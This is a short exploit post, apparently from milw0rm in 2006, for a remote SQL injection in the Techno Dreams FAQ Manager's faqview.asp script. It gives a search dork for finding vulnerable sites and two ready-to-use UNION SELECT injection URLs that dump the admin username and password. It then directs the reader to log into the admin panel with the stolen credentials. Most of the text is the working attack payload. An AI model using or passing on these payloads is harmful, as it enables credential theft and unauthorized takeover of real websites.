******************************************************************************* # Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability # Author : ajann # Dork : faqview.asp?key # Script Page : http://www.t-dreams.com # Exploit; ******************************************************************************* ###http://[target]/[path]/faqview.asp?key=[SQL HERE] Example: //faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin //faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin With admin username and password take it,after join to login page: ../[path]/admin/ # ajann,Turkey # ... # Im not Hacker! # milw0rm.com [2006-09-17]